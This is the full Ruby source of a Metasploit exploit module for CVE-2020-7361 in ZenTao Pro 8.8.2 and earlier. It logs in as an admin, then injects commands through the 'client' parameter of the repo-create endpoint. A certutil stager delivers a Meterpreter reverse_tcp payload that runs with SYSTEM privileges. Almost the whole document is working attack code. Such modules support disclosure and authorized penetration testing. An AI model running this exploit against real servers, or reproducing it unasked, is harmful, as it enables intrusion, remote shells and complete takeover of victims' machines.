ZenTao Pro 8.8.2 Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ZenTao Pro 8.8.2 Remote Code Execution',  
'Description' => %q{  
This module exploits a command injection vulnerability in ZenTao Pro  
8.8.2 and earlier versions in order to execute arbitrary commands with  
SYSTEM privileges.  
  
The module first attempts to authenticate to the ZenTao dashboard. It  
then tries to execute the payload by submitting fake repositories via  
the 'Repo Create' function that is accessible from the dashboard via  
CI>Repo. More precisely, the module sends HTTP POST requests to  
'/pro/repo-create.html' that inject commands in the vulnerable 'path'  
parameter which corresponds to the 'Client Path' input field.  
  
Valid credentials for a ZenTao admin account are required. This module  
has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on  
Windows 10 (XAMPP server).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Daniel Monzón', # Discovery  
'Melvin Boers', # PoC  
'Erik Wynter' # @wyntererik - Metasploit  
],  
'References' =>  
[  
['EDB', '48633'], # PoC  
['CVE', '2020-7361']  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows (x86)', {  
'Arch' => [ARCH_X86],  
'CmdStagerFlavor' => :certutil,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows (x64)', {  
'Arch' => [ARCH_X64],  
'CmdStagerFlavor' => :certutil,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 2020'  
)  
)  
  
register_options [  
OptString.new('TARGETURI', [true, 'The base path to ZenTao', '/pro/']),  
OptString.new('TARGETPATH', [true, 'The path on the target where commands will be executed', 'C:\\Windows\\Temp']),  
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),  
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])  
]  
end  
  
def check  
vprint_status('Running check')  
  
# visit login the page to get the necessary cookies  
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'user-login.html')  
unless res  
return CheckCode::Unknown('Connection failed')  
end  
  
cookie = res.get_cookies  
if cookie.blank?  
return CheckCode::Unknown('Unable to retrieve HTTP cookie header')  
end  
  
# check if the language is set to English, otherwise change it to English  
unless cookie.scan(/lang=(.*?);/).flatten.first == 'en-US'  
cookie.gsub!(/lang=(.*?);/, 'lang=en;')  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'score-ajax-selectLang.html'),  
'cookie' => cookie  
})  
  
unless res  
return CheckCode::Unknown('Connection failed')  
end  
  
@cookie = res.get_cookies  
if @cookie.blank?  
return CheckCode::Unknown('Unable to change the application language to English. Target may not be a ZenTao application')  
end  
end  
  
# visit login page to check ZenTao version  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'user-login.html'),  
'cookie' => @cookie  
})  
  
unless res  
return CheckCode::Unknown('Connection failed')  
end  
  
unless res.code == 200 && res.body.include?('Login - ZenTao')  
return CheckCode::Safe('Target is not a ZenTao application.')  
end  
  
# obtain cookie and random value necessary to autenticate later  
@cookie = res.get_cookies  
retrieve_rand_val(res)  
if @cookie.blank? || @random_value.blank?  
return CheckCode::Unknown('Unable to obtain the tokens required for authentication')  
end  
  
# obtain version  
version = res.body.scan(/v=pro(.*?)'/).flatten.first  
if version.blank?  
return CheckCode::Detected('Unable to obtain ZenTao version.')  
end  
  
@version = Gem::Version.new(version)  
  
unless @version <= Gem::Version.new('8.8.2')  
return CheckCode::Detected("Target is ZenTao version #{@version}.")  
end  
  
return CheckCode::Appears("Target is ZenTao version #{@version}.")  
  
end  
  
def retrieve_rand_val(res)  
html = res.get_html_document  
@random_value = html.at('input[@name="verifyRand"]')['value']  
  
fail_with(Failure::NotFound, 'Failed to retrieve token') unless @random_value  
end  
  
def login  
login_uri = normalize_uri(target_uri.path, 'user-login.html')  
unless @random_value  
res = send_request_cgi('method' => 'GET', 'uri' => login_uri)  
fail_with(Failure::UnexpectedReply, 'Unable to reach login page') unless res  
@cookie = res.get_cookies  
retrieve_rand_val(res)  
end  
  
# generate md5 hashes required for authentication  
hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)  
final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => login_uri,  
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',  
'cookie' => @cookie,  
'headers' => {  
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",  
'X-Requested-With' => 'XMLHttpRequest',  
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",  
},  
'vars_post' => {  
'account' => datastore['USERNAME'],  
'password' => final_hash,  
'passwordStrength' => '1',  
'referer' => '/pro/',  
'verifyRand' => @random_value,  
'KeepLogin' => '0'  
}  
})  
  
unless res  
fail_with(Failure::Disconnected, 'Connection failed')  
end  
  
unless res.code == 200 && res.body.include?('success')  
fail_with(Failure::NoAccess, 'Failed to authenticate. Please check if you have set the correct username and password.')  
end  
  
# visit /pro/, which is required to get to the dashboard at /pro/my/  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path),  
'cookie' => @cookie,  
'headers' => {  
'Upgrade-Insecure-Requests' => '1',  
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{login_uri}",  
}  
})  
  
unless res && res.code == 302  
fail_with(Failure::NoAccess, 'Failed to authenticate.')  
end  
  
# finally visit /pro/my/ and check if we have been authenticated  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'my'),  
'cookie' => @cookie  
})  
unless res && res.code == 200 && res.body.include?('Dashboard - ZenTao')  
fail_with(Failure::NoAccess, 'Failed to authenticate.')  
end  
print_good("Successfully authenticated to ZenTao #{@version}.")  
end  
  
def execute_command(cmd, _opts = {})  
cmd << ' &&' # this is necessary for compatibility with x86 targets (for x64 the module also works without this)  
repo_uri = normalize_uri(target_uri.path, 'repo-create')  
send_request_cgi({  
'method' => 'POST',  
'uri' => repo_uri,  
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',  
'cookie' => @cookie,  
'headers' => {  
'Accept' => 'application/json, text/javascript, */*; q=0.01',  
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/#{repo_uri}",  
'X-Requested-With' => 'XMLHttpRequest',  
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",  
},  
'vars_post' => {  
'SCM' => 'Git',  
'name' => Rex::Text.rand_text_alpha_lower(6..10),  
'path' => datastore['TARGETPATH'],  
'encoding' => 'utf-8',  
'client' => cmd  
}  
}, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload  
end  
  
def exploit  
login  
print_status('Executing the payload...')  
execute_cmdstager(background: true)  
end  
end  
`